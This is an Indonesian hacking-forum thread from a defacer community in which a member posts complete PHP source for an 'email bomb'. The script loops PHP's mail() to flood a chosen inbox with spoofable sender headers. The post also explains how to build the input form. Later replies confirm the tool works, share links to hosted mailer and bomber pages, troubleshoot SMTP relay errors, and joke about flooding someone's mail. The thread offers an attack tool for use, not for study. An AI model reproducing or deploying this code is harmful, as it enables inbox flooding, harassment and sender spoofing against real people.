::Gorontalo Defacer Community::
Would you like to react to this message? Create an account in a few clicks or log in to continue.


Komunitas Defacer Indonesia


 

IndeksPortalPencarianLatest imagesPendaftaranLogin

 

 How to make your own Email Boom

Go down 
+7
cYb3r_jOk3
saint
SmarterDOS
ascii
tukulesto
artsmoke
bL4Ck_3n91n3
11 posters
Pilih halaman : 1, 2  Next
PengirimMessage
bL4Ck_3n91n3
MotherFucker!?
MotherFucker!?
bL4Ck_3n91n3


Jumlah posting : 568
Join date : 18.04.08

How to make your own Email Boom Empty
PostSubyek: How to make your own Email Boom   How to make your own Email Boom Icon_minitimeTue May 13, 2008 12:00 am

Oke ini adalah tutorial membuat email bom pake php yang waktu itu gw post di forum sebelah si atan6 minta scriptnya tapi itu juga gw di kasih ma anak mainhack yang gw mo buka sourcenya disini bukan yang itu soalnya scriptnya terlalu rumit buat gw pelajarin jadi gw dah punya yang lebih simple... oke kita mulai...

buat file .php dengan nama fuck.php scriptnya sebagai berikut :

Code:
<?
// (c) bL4Ck_3n91n3
//Recoded by bL4Ck_3n91n3
//http://hikari-community.co.nr
$from=$_POST['from'];
$to=$_POST['to'];
$subject=$_POST['subject'];
$body=$_POST['body'];
$loops=$_POST['loops'];
$proc = "false";
$proccount = 0;
$protect = "false";
$x = 0;

$protection[0] = "bl4ck3n91n3@Phreaker.net";     
$protection[1] = "punkhackerboy@gmail.com";
$protection[2] = "bl4ck_3n91n3@hackermail.com";
$protection[3] = "qalby_08@yahoo.co.id";
// Silahkan loe ganti ding email diatas biar orang yang pake nih file gak nge bom email loe
// kalo mo nambah email yang di lindungi tambahin aja $protection[4] = "";  <= contoh

while ($proc == "false")
{
   if ($protection[$x] == "")
      $proc = "true";  // keluar loop

   if ($protection[$x] == $to)
   {
      $protect = "true";  // wakakaka!
      $proc = "true";      // keluar loop
   }
   $x++;
}

if ($protect == "true")
   protect($loops, $from, $protection, $subject, $body);
else
{

if ($from == "")
{
   $from = "blank";
}
else
{
   if ($to == "")
   {
      $to = "blank";
   }
   else
   {
      if ($loops == "")
      {
         $loops = "blank";
         error($loops,$to,$from);
      }
      else
      {
         sucess($loops,$to,$subject,$body,$from);
      }
   }
}
}

function sucess($loops,$to,$subject,$body,$from)
{
   for($x = 0; $x <= $loops; $x++)
   {
      mail($to,$subject,$body,"From: $from");
   }
   print("$loops Email telah terkirim ke $to  cihuuuuuuuyy");
}

function error($loops,$to,$from)
{
   if (($from == "blank") || ($loops == "blank") || ($to == "blank"))
   {
      print("Isi yang bener dong sayang!");
   }
}

function protect($loops, $from, $protection, $subject, $body)
{
   for($x = 0; $x <= $loops; $x++)
   {
      mail($from,$subject,$body,"From: $protection");
   }
   print("Loe mau nge bomb gw ?? Gak deh makasih banyak yah...gw balikin $loops email ke $from");
   
}


?>
nah udah kan ?? abis itu loe buat file .htm buat nampilin form email loe kasih nama vhia.htm isi scriptnya bisa loe rancang sendiri pada bisa html kan ?? masa gak bisa seh... kalo belum bisa belajar ma atan6 -_-! kode submit formnya gini :

Code:

<form action="fuck.php" method="POST">

Jangan lupa loe bikin 5 form sebagai berikut :

From :
To :
Subject :
Body :
Loops :

Nah ntu loops buat nentuin berapa banyak email yang bakalan di kirim Very Happy

Oke that's all thx
Kembali Ke Atas Go down
http://bl4ckb0t.co.cc
artsmoke
Newbie
Newbie



Jumlah posting : 6
Join date : 12.05.08

How to make your own Email Boom Empty
PostSubyek: Re: How to make your own Email Boom   How to make your own Email Boom Icon_minitimeTue May 13, 2008 7:37 pm

Thx bro...
Kembali Ke Atas Go down
tukulesto
Developt Kiddie
Developt Kiddie
tukulesto


Jumlah posting : 581
Join date : 17.05.08
Age : 38
Lokasi : dimana ada kamu, aku pasti ada

How to make your own Email Boom Empty
PostSubyek: Re: How to make your own Email Boom   How to make your own Email Boom Icon_minitimeTue May 20, 2008 1:50 pm

BERHASIL JURAGANNNNNNNNNNNNN lol! lol! lol!
Kembali Ke Atas Go down
http://www.tukulesto.co.cc
ascii
Admin
Admin



Jumlah posting : 379
Join date : 18.04.08

How to make your own Email Boom Empty
PostSubyek: Re: How to make your own Email Boom   How to make your own Email Boom Icon_minitimeFri May 23, 2008 1:07 pm

Code:
http://16act.com/cache/error_log.php

dicobaa

thx i.t.e.m What a Face


Terakhir diubah oleh ascii tanggal Sat May 24, 2008 2:38 am, total 1 kali diubah (Reason for editing : update link)
Kembali Ke Atas Go down
bL4Ck_3n91n3
MotherFucker!?
MotherFucker!?
bL4Ck_3n91n3


Jumlah posting : 568
Join date : 18.04.08

How to make your own Email Boom Empty
PostSubyek: Re: How to make your own Email Boom   How to make your own Email Boom Icon_minitimeFri May 23, 2008 6:55 pm

ocre... sama2...

/me cuman post pelontarnya aja biar pada kreatif buatnya... punya si atan6 bagus juga tuh Laughing
Kembali Ke Atas Go down
http://bl4ckb0t.co.cc
SmarterDOS
Developt Kiddie
Developt Kiddie
SmarterDOS


Jumlah posting : 467
Join date : 18.05.08

How to make your own Email Boom Empty
PostSubyek: Re: How to make your own Email Boom   How to make your own Email Boom Icon_minitimeSat May 24, 2008 12:54 am

COBA DULU AHHHHHH,
Kembali Ke Atas Go down
http://forum.balikita.net/index.php?referrer=91
ascii
Admin
Admin



Jumlah posting : 379
Join date : 18.04.08

How to make your own Email Boom Empty
PostSubyek: Re: How to make your own Email Boom   How to make your own Email Boom Icon_minitimeSat May 24, 2008 2:39 am

result donk.. gmn berhasil ?
Kembali Ke Atas Go down
SmarterDOS
Developt Kiddie
Developt Kiddie
SmarterDOS


Jumlah posting : 467
Join date : 18.05.08

How to make your own Email Boom Empty
PostSubyek: Re: How to make your own Email Boom   How to make your own Email Boom Icon_minitimeSat May 24, 2008 5:09 am

belum nyoba,

soalnya tadi internet ku mati,

gak tau kenapa,

ini baru jalan
Kembali Ke Atas Go down
http://forum.balikita.net/index.php?referrer=91
bL4Ck_3n91n3
MotherFucker!?
MotherFucker!?
bL4Ck_3n91n3


Jumlah posting : 568
Join date : 18.04.08

How to make your own Email Boom Empty
PostSubyek: Re: How to make your own Email Boom   How to make your own Email Boom Icon_minitimeSun May 25, 2008 5:02 am

Berhasil kok kk

nih previewnya

How to make your own Email Boom Tes10
Kembali Ke Atas Go down
http://bl4ckb0t.co.cc
ascii
Admin
Admin



Jumlah posting : 379
Join date : 18.04.08

How to make your own Email Boom Empty
PostSubyek: Re: How to make your own Email Boom   How to make your own Email Boom Icon_minitimeSun May 25, 2008 10:10 am

mantap.. he he..

gw mo coba test ke email u donk bhie.. Laughing
Kembali Ke Atas Go down
bL4Ck_3n91n3
MotherFucker!?
MotherFucker!?
bL4Ck_3n91n3


Jumlah posting : 568
Join date : 18.04.08

How to make your own Email Boom Empty
PostSubyek: Re: How to make your own Email Boom   How to make your own Email Boom Icon_minitimeMon May 26, 2008 1:31 am

sini gw tes ke pantatmu

wuakakakakakaka

peace man lol!
Kembali Ke Atas Go down
http://bl4ckb0t.co.cc
SmarterDOS
Developt Kiddie
Developt Kiddie
SmarterDOS


Jumlah posting : 467
Join date : 18.05.08

How to make your own Email Boom Empty
PostSubyek: Re: How to make your own Email Boom   How to make your own Email Boom Icon_minitimeTue Jun 17, 2008 6:09 am

kk,

kok tulisan yang keluar kayak gini

Code:
Warning: mail(): SMTP server response: 550 5.7.1 Unable to relay for john_thebassist2000@hotmail.com in \\192.168.1.16\webfiles\files\2008-4\1834277\SWF\bomber.php on line 66
Kembali Ke Atas Go down
http://forum.balikita.net/index.php?referrer=91
ascii
Admin
Admin



Jumlah posting : 379
Join date : 18.04.08

How to make your own Email Boom Empty
PostSubyek: Re: How to make your own Email Boom   How to make your own Email Boom Icon_minitimeWed Jun 25, 2008 2:27 am

@atas
upload filenya dimn ?

gak semua webhosting mendukung SMTP lho ?
Kembali Ke Atas Go down
bL4Ck_3n91n3
MotherFucker!?
MotherFucker!?
bL4Ck_3n91n3


Jumlah posting : 568
Join date : 18.04.08

How to make your own Email Boom Empty
PostSubyek: Re: How to make your own Email Boom   How to make your own Email Boom Icon_minitimeWed Jun 25, 2008 4:38 am

pake punyaQ aza

http://bl4ckb0t.co.cc/alat/mailbom.php

langsung croot

Razz Razz Razz Razz Razz Razz Razz
Kembali Ke Atas Go down
http://bl4ckb0t.co.cc
SmarterDOS
Developt Kiddie
Developt Kiddie
SmarterDOS


Jumlah posting : 467
Join date : 18.05.08

How to make your own Email Boom Empty
PostSubyek: Re: How to make your own Email Boom   How to make your own Email Boom Icon_minitimeWed Jun 25, 2008 11:19 am

ascii wrote:
@atas
upload filenya dimn ?

gak semua webhosting mendukung SMTP lho ?

saya upload di fileave sama ripway

bL4Ck_3n91n3 wrote:
pake punyaQ aza

http://bl4ckb0t.co.cc/alat/mailbom.php

langsung croot

Razz Razz Razz Razz Razz Razz Razz

cannot found http://dbstudio-online.com/wp-mail.php
Kembali Ke Atas Go down
http://forum.balikita.net/index.php?referrer=91
bL4Ck_3n91n3
MotherFucker!?
MotherFucker!?
bL4Ck_3n91n3


Jumlah posting : 568
Join date : 18.04.08

How to make your own Email Boom Empty
PostSubyek: Re: How to make your own Email Boom   How to make your own Email Boom Icon_minitimeWed Jun 25, 2008 8:22 pm

iya emang lagi dalam perbaikan Razz
Kembali Ke Atas Go down
http://bl4ckb0t.co.cc
saint
Script Kiddies
Script Kiddies
saint


Jumlah posting : 157
Join date : 22.05.08
Age : 39
Lokasi : Neraka Bagian Timur

How to make your own Email Boom Empty
PostSubyek: Re: How to make your own Email Boom   How to make your own Email Boom Icon_minitimeThu Jun 26, 2008 11:50 pm

ayo dong black
perbaiki Razz Razz Razz
Kembali Ke Atas Go down
http://www.webdeessaint.com
bL4Ck_3n91n3
MotherFucker!?
MotherFucker!?
bL4Ck_3n91n3


Jumlah posting : 568
Join date : 18.04.08

How to make your own Email Boom Empty
PostSubyek: Re: How to make your own Email Boom   How to make your own Email Boom Icon_minitimeFri Jun 27, 2008 2:12 am

saint wrote:
ayo dong black
perbaiki Razz Razz Razz

kagak ada duit bos nambah quota bandwidth Sad donate dong
Kembali Ke Atas Go down
http://bl4ckb0t.co.cc
SmarterDOS
Developt Kiddie
Developt Kiddie
SmarterDOS


Jumlah posting : 467
Join date : 18.05.08

How to make your own Email Boom Empty
PostSubyek: Re: How to make your own Email Boom   How to make your own Email Boom Icon_minitimeFri Jun 27, 2008 4:20 am

bL4Ck_3n91n3 wrote:
saint wrote:
ayo dong black
perbaiki Razz Razz Razz

kagak ada duit bos nambah quota bandwidth Sad donate dong

weleh2
yang rusak nya dimananya ??
kalau urusan bantu membantu gpp lah
kalau urusan duit minta ama om admin aja
atau bang tukul lol! lol!
Kembali Ke Atas Go down
http://forum.balikita.net/index.php?referrer=91
saint
Script Kiddies
Script Kiddies
saint


Jumlah posting : 157
Join date : 22.05.08
Age : 39
Lokasi : Neraka Bagian Timur

How to make your own Email Boom Empty
PostSubyek: Re: How to make your own Email Boom   How to make your own Email Boom Icon_minitimeFri Jun 27, 2008 12:11 pm

brp?
gpp dah
gw pgn bgt tu alat
Kembali Ke Atas Go down
http://www.webdeessaint.com
ascii
Admin
Admin



Jumlah posting : 379
Join date : 18.04.08

How to make your own Email Boom Empty
PostSubyek: Re: How to make your own Email Boom   How to make your own Email Boom Icon_minitimeSat Jun 28, 2008 8:04 am

@atas..

mo banjirin email sapa tuh ? Razz
Kembali Ke Atas Go down
cYb3r_jOk3
Script Kiddies
Script Kiddies
cYb3r_jOk3


Jumlah posting : 232
Join date : 12.05.08
Age : 36
Lokasi : mAlaNk jAWatiMUr

How to make your own Email Boom Empty
PostSubyek: Re: How to make your own Email Boom   How to make your own Email Boom Icon_minitimeTue Jul 08, 2008 8:11 pm

omz saya coba kuk malah keluar tulisan...
Spoiler:
wedew bingung omzzzz
newbee neh........ lol! lol! lol!
Kembali Ke Atas Go down
http://baeimlicious.blogspot.com
SmarterDOS
Developt Kiddie
Developt Kiddie
SmarterDOS


Jumlah posting : 467
Join date : 18.05.08

How to make your own Email Boom Empty
PostSubyek: Re: How to make your own Email Boom   How to make your own Email Boom Icon_minitimeThu Jul 10, 2008 7:15 am

ascii wrote:
@atas..

mo banjirin email sapa tuh ? Razz
e-mail seseorang bernama .... lol! lol! lol!
Kembali Ke Atas Go down
http://forum.balikita.net/index.php?referrer=91
ascii
Admin
Admin



Jumlah posting : 379
Join date : 18.04.08

How to make your own Email Boom Empty
PostSubyek: Re: How to make your own Email Boom   How to make your own Email Boom Icon_minitimeWed Jul 16, 2008 3:07 pm

Code:
http://untouch-me.co.cc/info/mailer.php

silakan dipergunakan... What a Face
Kembali Ke Atas Go down
bL4Ck_3n91n3
MotherFucker!?
MotherFucker!?
bL4Ck_3n91n3


Jumlah posting : 568
Join date : 18.04.08

How to make your own Email Boom Empty
PostSubyek: Re: How to make your own Email Boom   How to make your own Email Boom Icon_minitimeThu Aug 14, 2008 7:04 pm

http://bl4ckb0t.co.cc/alat/mailbom.php

silahkan dipakai punyaQ dah bisa
jgn kelewatan yah ngirimnya
Kembali Ke Atas Go down
http://bl4ckb0t.co.cc
Sponsored content





How to make your own Email Boom Empty
PostSubyek: Re: How to make your own Email Boom   How to make your own Email Boom Icon_minitime

Kembali Ke Atas Go down
 
How to make your own Email Boom
Kembali Ke Atas 
Halaman 1 dari 2Pilih halaman : 1, 2  Next
 Similar topics
-
» EMAIL FORWARDING dan GMAIL: Paduan Sempurna!
» How to Make psybnc with shell
» How to Make Spybot bot for ddos

Permissions in this forum:Anda tidak dapat menjawab topik
::Gorontalo Defacer Community:: :: General Topic :: Tips and Trik-
Navigasi: